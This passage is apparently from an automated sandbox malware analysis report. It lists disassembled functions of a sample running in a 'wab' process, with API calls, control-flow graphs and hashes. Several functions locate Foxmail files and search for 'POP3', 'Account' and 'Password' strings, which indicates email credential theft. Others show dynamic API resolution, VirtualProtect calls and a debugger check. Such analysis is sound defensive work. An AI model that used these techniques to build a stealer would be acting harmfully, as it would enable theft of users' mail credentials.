                                                                                                                • Opcode ID: b4c302ff3826f049acb3e08ddfebd525b77e3e06ab92cbe287abd1da851e1ada
                                                                                                                • Instruction ID: 1de16de721a2e61bbec5feb66ec930a9b1bbe67d9f2f48f774f2507dd6bc87e1
                                                                                                                • Opcode Fuzzy Hash: b4c302ff3826f049acb3e08ddfebd525b77e3e06ab92cbe287abd1da851e1ada
                                                                                                                • Instruction Fuzzy Hash: 1E110AB16003419FEB045A35CA8D78A77A1EF153B5F964259DE56870F6E364C880CB11
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 22C912EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 22C91434
                                                                                                                  • Part of subcall function 22C910F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 22C91137
                                                                                                                  • Part of subcall function 22C910F1: lstrcatW.KERNEL32(?,?), ref: 22C91151
                                                                                                                  • Part of subcall function 22C910F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 22C9115C
                                                                                                                  • Part of subcall function 22C910F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 22C9116D
                                                                                                                  • Part of subcall function 22C910F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 22C9117C
                                                                                                                  • Part of subcall function 22C910F1: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 22C91193
                                                                                                                  • Part of subcall function 22C910F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 22C911D0
                                                                                                                  • Part of subcall function 22C910F1: FindClose.KERNEL32(00000000), ref: 22C911DB
                                                                                                                • lstrlenW.KERNEL32(?), ref: 22C914C5
                                                                                                                • lstrlenW.KERNEL32(?), ref: 22C914E0
                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 22C9150F
                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 22C91521
                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 22C91547
                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 22C91553
                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 22C91579
                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 22C91585
                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 22C915AB
                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 22C915B7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                • String ID: )$Foxmail$ProgramFiles
                                                                                                                • API String ID: 672098462-2938083778
                                                                                                                • Opcode ID: c68e3b91b927777a7498becdd7e905e959d8616c0286c76b1cf9ea112295b710
                                                                                                                • Instruction ID: 008e78e2f3e67f500d6ee2d81d0d292487d6d9b601ec12f03bb010bc1899354b
                                                                                                                • Opcode Fuzzy Hash: c68e3b91b927777a7498becdd7e905e959d8616c0286c76b1cf9ea112295b710
                                                                                                                • Instruction Fuzzy Hash: A981B471A4035CA9EB20DBA0DC85FEF737DEF84700F00159AF509E72A0EAB15A84CB95
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 22C9C7E6 Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(22C9C7DD), ref: 22C9C7E6
                                                                                                                • GetModuleHandleA.KERNEL32(?,22C9C7DD), ref: 22C9C838
                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 22C9C860
                                                                                                                  • Part of subcall function 22C9C803: GetProcAddress.KERNEL32(00000000,22C9C7F4), ref: 22C9C804
                                                                                                                  • Part of subcall function 22C9C803: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,22C9C7F4,22C9C7DD), ref: 22C9C816
                                                                                                                  • Part of subcall function 22C9C803: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,22C9C7F4,22C9C7DD), ref: 22C9C82A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 2099061454-0
                                                                                                                • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                • Instruction ID: 189caef9c6441aab1aa16ed2190f8c5a5ca19f685e70b72a91793e1a1433dfd3
                                                                                                                • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                • Instruction Fuzzy Hash: 2E012E30945380F8AB108374CD04ABA6FD89FAF6A8B101B96E20086093C9A08302C3AE
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 22C9C7A7 Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 80 22c9c7a7-22c9c7bc 81 22c9c82d 80->81 82 22c9c7be-22c9c7c6 80->82 83 22c9c82f-22c9c833 81->83 82->81 84 22c9c7c8-22c9c7f6 call 22c9c7e6 82->84 85 22c9c872 call 22c9c877 83->85 86 22c9c835-22c9c83d GetModuleHandleA 83->86 92 22c9c7f8 84->92 93 22c9c86c 84->93 88 22c9c83f-22c9c847 86->88 88->88 91 22c9c849-22c9c84c 88->91 91->83 94 22c9c84e-22c9c850 91->94 95 22c9c85b-22c9c85e 92->95 96 22c9c7fa-22c9c7fc 92->96 97 22c9c86d-22c9c86e 93->97 99 22c9c852-22c9c854 94->99 100 22c9c856-22c9c85a 94->100 98 22c9c85f-22c9c860 GetProcAddress 95->98 96->97 101 22c9c7fe 96->101 102 22c9c870 97->102 103 22c9c866-22c9c86b 97->103 104 22c9c865 98->104 99->98 100->95 101->104 105 22c9c800-22c9c80b GetProcAddress 101->105 102->91 103->93 104->103 105->81 106 22c9c80d-22c9c81a VirtualProtect 105->106 107 22c9c82c 106->107 108 22c9c81c-22c9c82a VirtualProtect 106->108 107->81 108->107
                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(?,22C9C7DD), ref: 22C9C838
                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 22C9C860
                                                                                                                  • Part of subcall function 22C9C7E6: GetModuleHandleA.KERNEL32(22C9C7DD), ref: 22C9C7E6
                                                                                                                  • Part of subcall function 22C9C7E6: GetProcAddress.KERNEL32(00000000,22C9C7F4), ref: 22C9C804
                                                                                                                  • Part of subcall function 22C9C7E6: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,22C9C7F4,22C9C7DD), ref: 22C9C816
                                                                                                                  • Part of subcall function 22C9C7E6: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,22C9C7F4,22C9C7DD), ref: 22C9C82A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 2099061454-0
                                                                                                                • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                • Instruction ID: 8b6343d092cfcb481db9e31fec5168b9777f320ea18079c93c0d31feb00b0a04
                                                                                                                • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                • Instruction Fuzzy Hash: F021F172449381EFE7118BB4CD04BB66FD89F9F2A4F190A96D140CB183D5A98746C3AA
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 22C9C803 Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 109 22c9c803-22c9c80b GetProcAddress 110 22c9c82d 109->110 111 22c9c80d-22c9c81a VirtualProtect 109->111 112 22c9c82f-22c9c833 110->112 113 22c9c82c 111->113 114 22c9c81c-22c9c82a VirtualProtect 111->114 115 22c9c872 call 22c9c877 112->115 116 22c9c835-22c9c83d GetModuleHandleA 112->116 113->110 114->113 117 22c9c83f-22c9c847 116->117 117->117 119 22c9c849-22c9c84c 117->119 119->112 120 22c9c84e-22c9c850 119->120 121 22c9c852-22c9c854 120->121 122 22c9c856-22c9c85e 120->122 124 22c9c85f-22c9c865 GetProcAddress 121->124 122->124 126 22c9c866-22c9c86e 124->126 129 22c9c870 126->129 129->119
                                                                                                                APIs
                                                                                                                • GetProcAddress.KERNEL32(00000000,22C9C7F4), ref: 22C9C804
                                                                                                                • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,22C9C7F4,22C9C7DD), ref: 22C9C816
                                                                                                                • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,22C9C7F4,22C9C7DD), ref: 22C9C82A
                                                                                                                • GetModuleHandleA.KERNEL32(?,22C9C7DD), ref: 22C9C838
                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 22C9C860
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 2152742572-0
                                                                                                                • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                • Instruction ID: 432778a9b77eb464975ba571c4f53319fd0cdfe79d7408bf89739dc1ee974f4f
                                                                                                                • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                • Instruction Fuzzy Hash: B4F0A9B1689380FCFA1147B58D45EBA5FCC8FAF6A4B101A56E210C7183D8A5870683FE
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                Function 22C960E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 22C961DA
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 22C961E4
                                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 22C961F1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                • String ID:
                                                                                                                • API String ID: 3906539128-0
                                                                                                                • Opcode ID: 6d3541609b0cd1863790063bdc60639d1d5cc76259811c9cc9bb88bad69a830c
                                                                                                                • Instruction ID: daebd36b0abc220bca5dc4ab3c001c1d0e164356f88a3b47c5f681aa836a6d05
                                                                                                                • Opcode Fuzzy Hash: 6d3541609b0cd1863790063bdc60639d1d5cc76259811c9cc9bb88bad69a830c
                                                                                                                • Instruction Fuzzy Hash: FE31E57494131C9BCB21DF24D988B9DBBB8BF08310F5042DAE85CA7290E7749B81CF45
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 22C94AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(?,?,22C94A8A,?,22CA2238,0000000C,22C94BBD,00000000,00000000,?,22C92082,22CA2108,0000000C,22C91F3A,?), ref: 22C94AD5
                                                                                                                • TerminateProcess.KERNEL32(00000000,?,22C94A8A,?,22CA2238,0000000C,22C94BBD,00000000,00000000,?,22C92082,22CA2108,0000000C,22C91F3A,?), ref: 22C94ADC
                                                                                                                • ExitProcess.KERNEL32 ref: 22C94AEE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                • String ID:
                                                                                                                • API String ID: 1703294689-0
                                                                                                                • Opcode ID: 41027143e2667c463b76587c55840f2eab618cf170525a99df58e626e84a73fa
                                                                                                                • Instruction ID: 3d569ab9edba93e6d90d7fb7348a4508d456c4c6447a2bf845f9b73fb336cd27
                                                                                                                • Opcode Fuzzy Hash: 41027143e2667c463b76587c55840f2eab618cf170525a99df58e626e84a73fa
                                                                                                                • Instruction Fuzzy Hash: 75E04636040348AFCF117F24CE0CE6A3B2AEF40341B504510FE089B021DB39E942DA84
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 22C96ACB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 22C96AF0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Info
                                                                                                                • String ID:
                                                                                                                • API String ID: 1807457897-3916222277
                                                                                                                • Opcode ID: 3eb9d7c85178847ea49f5561548706516414c38004e21dbb7cb81a07944a4923
                                                                                                                • Instruction ID: a1572bf017b59fb7e7a6b8004ae50cff41dd6316ec2082f875d3c49e58a8df35
                                                                                                                • Opcode Fuzzy Hash: 3eb9d7c85178847ea49f5561548706516414c38004e21dbb7cb81a07944a4923
                                                                                                                • Instruction Fuzzy Hash: 724158B05043CC9ADB228F24CD84FF6BBE9EB55308F2405EDE58987182E235AA45DF60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 22C96580 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: .
                                                                                                                • API String ID: 0-248832578
                                                                                                                • Opcode ID: f1fff4fee63a94da89378ff1b3fb272b0e330f2cbdd043076aa4ee7d3e20afa1
                                                                                                                • Instruction ID: c9d245e08544bfc0a1d02ab30b0be254b37f0f9ae815e742865e18536d406583
                                                                                                                • Opcode Fuzzy Hash: f1fff4fee63a94da89378ff1b3fb272b0e330f2cbdd043076aa4ee7d3e20afa1
                                                                                                                • Instruction Fuzzy Hash: A031F671900389AFDB14AF78CD84EFA7BBDDB85304F2002ACE919D7295E6319A45CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 22C9724E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HeapProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 54951025-0
                                                                                                                • Opcode ID: 37fa8d6b96e4d0a99e8df2f68a6a8ff69caf6a483512f4d3c1521a1b534d7ff8
                                                                                                                • Instruction ID: 7387d945b7a02cfccdbc30c7148b04bb0b536bf68e00ace582f507ca0fdc3bf4
                                                                                                                • Opcode Fuzzy Hash: 37fa8d6b96e4d0a99e8df2f68a6a8ff69caf6a483512f4d3c1521a1b534d7ff8
                                                                                                                • Instruction Fuzzy Hash: 2BA011302802028F83008EBA8B0E20C3AAEAA002803000AA8AC08CB008EB2880208A02
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 22C9173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 150 22c9173a-22c917fe call 22c9c030 call 22c92c40 * 2 157 22c91803 call 22c91cca 150->157 158 22c91808-22c9180c 157->158 159 22c919ad-22c919b1 158->159 160 22c91812-22c91816 158->160 160->159 161 22c9181c-22c91837 call 22c91ede 160->161 164 22c9183d-22c91845 161->164 165 22c9199f-22c919ac call 22c91ee7 * 2 161->165 166 22c9184b-22c9184e 164->166 167 22c91982-22c91985 164->167 165->159 166->167 171 22c91854-22c91881 call 22c944b0 * 2 call 22c91db7 166->171 169 22c91995-22c91999 167->169 170 22c91987 167->170 169->164 169->165 173 22c9198a-22c9198d call 22c92c40 170->173 184 22c9193d-22c91943 171->184 185 22c91887-22c9189f call 22c944b0 call 22c91db7 171->185 179 22c91992 173->179 179->169 186 22c9197e-22c91980 184->186 187 22c91945-22c91947 184->187 185->184 198 22c918a5-22c918a8 185->198 186->173 187->186 189 22c91949-22c9194b 187->189 191 22c9194d-22c9194f 189->191 192 22c91961-22c9197c call 22c916aa 189->192 194 22c91951-22c91953 191->194 195 22c91955-22c91957 191->195 192->179 194->192 194->195 199 22c91959-22c9195b 195->199 200 22c9195d-22c9195f 195->200 202 22c918aa-22c918c2 call 22c944b0 call 22c91db7 198->202 203 22c918c4-22c918dc call 22c944b0 call 22c91db7 198->203 199->192 199->200 200->186 200->192 202->203 212 22c918e2-22c9193b call 22c916aa call 22c915da call 22c92c40 * 2 202->212 203->169 203->212 212->169
                                                                                                                APIs
                                                                                                                  • Part of subcall function 22C91CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 22C91D1B
                                                                                                                  • Part of subcall function 22C91CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 22C91D37
                                                                                                                  • Part of subcall function 22C91CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22C91D4B
                                                                                                                • _strlen.LIBCMT ref: 22C91855
                                                                                                                • _strlen.LIBCMT ref: 22C91869
                                                                                                                • _strlen.LIBCMT ref: 22C9188B
                                                                                                                • _strlen.LIBCMT ref: 22C918AE
                                                                                                                • _strlen.LIBCMT ref: 22C918C8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _strlen$File$CopyCreateDelete
                                                                                                                • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                • API String ID: 3296212668-3023110444
                                                                                                                • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                • Instruction ID: 845bdb81ea8f407ba570326f092d52247b02d45a61420e920b5d8f030f75a762
                                                                                                                • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                • Instruction Fuzzy Hash: B6610371D00318AFEF11CBA4C942BFEB7B9AF55308F004196D244AB3A4EBB45A46CB56
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 22C919B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _strlen
                                                                                                                • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                • API String ID: 4218353326-230879103
                                                                                                                • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                • Instruction ID: ddb66299eb12c54b541b1f8f2fe9b66fcf7c8225a8dbe2a8f8e0f3877952dab1
                                                                                                                • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                • Instruction Fuzzy Hash: 5E71F5B1D003685BDB119BB59C84AFF7BFCAF59704F104096E644E7241EAB4DB85CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 22C97CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 290 22c97cc2-22c97cd6 291 22c97cd8-22c97cdd 290->291 292 22c97d44-22c97d4c 290->292 291->292 295 22c97cdf-22c97ce4 291->295 293 22c97d4e-22c97d51 292->293 294 22c97d93-22c97dab call 22c97e35 292->294 293->294 296 22c97d53-22c97d90 call 22c9571e * 4 293->296 302 22c97dae-22c97db5 294->302 295->292 298 22c97ce6-22c97ce9 295->298 296->294 298->292 301 22c97ceb-22c97cf3 298->301 303 22c97d0d-22c97d15 301->303 304 22c97cf5-22c97cf8 301->304 306 22c97dd4-22c97dd8 302->306 307 22c97db7-22c97dbb 302->307 309 22c97d2f-22c97d43 call 22c9571e * 2 303->309 310 22c97d17-22c97d1a 303->310 304->303 308 22c97cfa-22c97d0c call 22c9571e call 22c990ba 304->308 317 22c97dda-22c97ddf 306->317 318 22c97df0-22c97dfc 306->318 312 22c97dbd-22c97dc0 307->312 313 22c97dd1 307->313 308->303 309->292 310->309 315 22c97d1c-22c97d2e call 22c9571e call 22c991b8 310->315 312->313 321 22c97dc2-22c97dd0 call 22c9571e * 2 312->321 313->306 315->309 325 22c97ded 317->325 326 22c97de1-22c97de4 317->326 318->302 320 22c97dfe-22c97e0b call 22c9571e 318->320 321->313 325->318 326->325 334 22c97de6-22c97dec call 22c9571e 326->334 334->325
                                                                                                                APIs
                                                                                                                • ___free_lconv_mon.LIBCMT ref: 22C97D06
                                                                                                                  • Part of subcall function 22C990BA: _free.LIBCMT ref: 22C990D7
                                                                                                                  • Part of subcall function 22C990BA: _free.LIBCMT ref: 22C990E9
                                                                                                                  • Part of subcall function 22C990BA: _free.LIBCMT ref: 22C990FB
                                                                                                                  • Part of subcall function 22C990BA: _free.LIBCMT ref: 22C9910D
                                                                                                                  • Part of subcall function 22C990BA: _free.LIBCMT ref: 22C9911F
                                                                                                                  • Part of subcall function 22C990BA: _free.LIBCMT ref: 22C99131
                                                                                                                  • Part of subcall function 22C990BA: _free.LIBCMT ref: 22C99143
                                                                                                                  • Part of subcall function 22C990BA: _free.LIBCMT ref: 22C99155
                                                                                                                  • Part of subcall function 22C990BA: _free.LIBCMT ref: 22C99167
                                                                                                                  • Part of subcall function 22C990BA: _free.LIBCMT ref: 22C99179
                                                                                                                  • Part of subcall function 22C990BA: _free.LIBCMT ref: 22C9918B
                                                                                                                  • Part of subcall function 22C990BA: _free.LIBCMT ref: 22C9919D
                                                                                                                  • Part of subcall function 22C990BA: _free.LIBCMT ref: 22C991AF
                                                                                                                • _free.LIBCMT ref: 22C97CFB
                                                                                                                  • Part of subcall function 22C9571E: HeapFree.KERNEL32(00000000,00000000,?,22C9924F,?,00000000,?,00000000,?,22C99276,?,00000007,?,?,22C97E5A,?), ref: 22C95734
                                                                                                                  • Part of subcall function 22C9571E: GetLastError.KERNEL32(?,?,22C9924F,?,00000000,?,00000000,?,22C99276,?,00000007,?,?,22C97E5A,?,?), ref: 22C95746
                                                                                                                • _free.LIBCMT ref: 22C97D1D
                                                                                                                • _free.LIBCMT ref: 22C97D32
                                                                                                                • _free.LIBCMT ref: 22C97D3D
                                                                                                                • _free.LIBCMT ref: 22C97D5F
                                                                                                                • _free.LIBCMT ref: 22C97D72
                                                                                                                • _free.LIBCMT ref: 22C97D80
                                                                                                                • _free.LIBCMT ref: 22C97D8B
                                                                                                                • _free.LIBCMT ref: 22C97DC3
                                                                                                                • _free.LIBCMT ref: 22C97DCA
                                                                                                                • _free.LIBCMT ref: 22C97DE7
                                                                                                                • _free.LIBCMT ref: 22C97DFF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
